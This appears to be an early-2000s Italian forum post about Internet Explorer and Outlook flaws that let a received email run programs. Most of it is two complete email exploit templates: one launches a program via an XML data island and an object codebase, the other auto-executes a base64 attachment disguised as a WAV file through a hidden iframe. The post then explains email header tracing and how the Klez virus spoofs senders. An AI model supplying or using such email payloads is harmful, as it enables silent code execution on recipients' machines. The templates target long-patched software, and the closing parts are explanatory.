Allora, mi sembra ci sia un po' di confusione in questo post.
Come ho già detto in altri post le versioni di IE inferiori alla 6 hanno un simpatico bug per il quale è possibile eseguire files sia sulla macchina in questione sia gli allegati, sia codice html, vbs o java ( e quelli supportati ) opportunamente inserito nel corpo del messaggio.
Gli exploit per farlo sono disponibili in molti siti e li propongo qui per l'ultima volta ( spero che i moderatori non si incazzicchino perchè mi ripeto in post diversi )
Questo è il contenuto di una generica e non completa ( non personalizzata e indirizzata )
mail che avvierà un programma posizionato sulla macchina che la apre.
Non pensate che gli eseguibili su una macchina non siano dannosi, basti pensare che un allegato ( in teoria possibilmente dannoso ) è presente sulla macchina nel momento dell'apertura della mail ( in temp o altre cartelle, a discrezione del programma di posta utilizzato o dalle impostazioni date dall'utente )
Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="----=_NextPart_000_0397_01C1C9DC.6A16ED00";
type="multipart/alternative"
X-Priority: 3
X-MSMail-Priority: Normal
------=_NextPart_000_0397_01C1C9DC.6A16ED00
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0398_01C1C9DC.6A16ED00"
------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
/*Message*/
------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft><FONT face=3DArial color=3D#000000 size=3D2>
/*Message*/
</FONT></DIV>
<DIV><BR> </DIV>
<DIV><BR> </DIV>
<DIV><BR> </DIV>
<DIV><BR> </DIV>
<DIV><BR> </DIV>
<DIV><BR> </DIV>
<span datasrc=3D"#oExec" datafld=3D"exploit" dataformatas=3D"html"></span>
<xml id=3D"oExec">
<security>
<exploit>
<![CDATA[
<object id=3D"oFile" classid=3D"clsid:11111111-1111-1111-1111-111111111111" codebase=3D"/*Program to run*/"></object>
]]>
</exploit>
</security>
</xml>
</BODY></HTML>
------=_NextPart_001_0398_01C1C9DC.6A16ED00--
------=_NextPart_000_0397_01C1C9DC.6A16ED00--
Con quest'altro exploit ecco che è
possibile eseguire l'allegato.
Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD></HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe>
/*Message*/
</BODY>
</HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="/*Name of attachment*/"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
#*BASE64Attachment to run*#
--====_ABC1234567890DEF_====
Entrambi questo codici sono
inoffensivi per le versioni di IE ( e quindi outlook ) superiori alla 5.5 e patchati con gli tultimi aggiornamenti ( necessario per impedire l'esecuzione di un programma in locale
http://www.microsoft.com/technet/treevi ... 02-015.asp) . Se li utilizzerai su una macchina non coperta o protetta, sappi che sei un pezzente.
Per dare un occhio agli headers di una mail basta salvarla ed aprirla con un qualsiasi editor di testo ma dall' ip non è possibile risalire al mittente.....non siamo la polizia postale...è solo possibile restringere il campo ( a seconda degli otetti ) ad un provider...bene che vada , tracciando o informandosi sugli otetti, si può risalire alla regione o al max provincia, ma dipende dai provider e non me ne sono interessato ultimamente.
Molti si sono lamentati ( non solo in questo forum ) che amici avessero ricevuto mail provenienti da loro con allegati infetti ma nel momento in cui il possibile mittente ha fatto una scansione ecco che nessun virus è stato rilevato pur l'antivurus fosse aggiornato per scovare quello specifico virus...perchè ???
Perchè i virus writer sono dei simpaticoni !!
Le ultime varianti dei più noti virus, primo fra tutti Klez non solo scansiscono il sistema alla ricerca di mail in qualsiasi file, ma non utilizzano più l'indirizzo dell'infetto per autospedirsi, utilizzano uno degli indirizzi trovati, al quale il virus non si auto invia ( bè, poi questo dipende dalla versione )........ Insomma, se vengo infettato e nel mio pc Klez trova
bian@coniglio.it e
coniglio@bian.it, si autoinvia a
bian@coniglio.it con mittente
coniglio@bian.it ( estraneo all'infezione ) mentre la mia mail non compare da nessuna parte !
Bhom...ho detto tutto...
Ciauz
Aggiornamento delle 18.21
Mi è stato già chiesta una delucidazioen riguardo Klez... Bè, date un occhio qui :
http://punto-informatico.it/p.asp?i=39867
Ri ciauzz
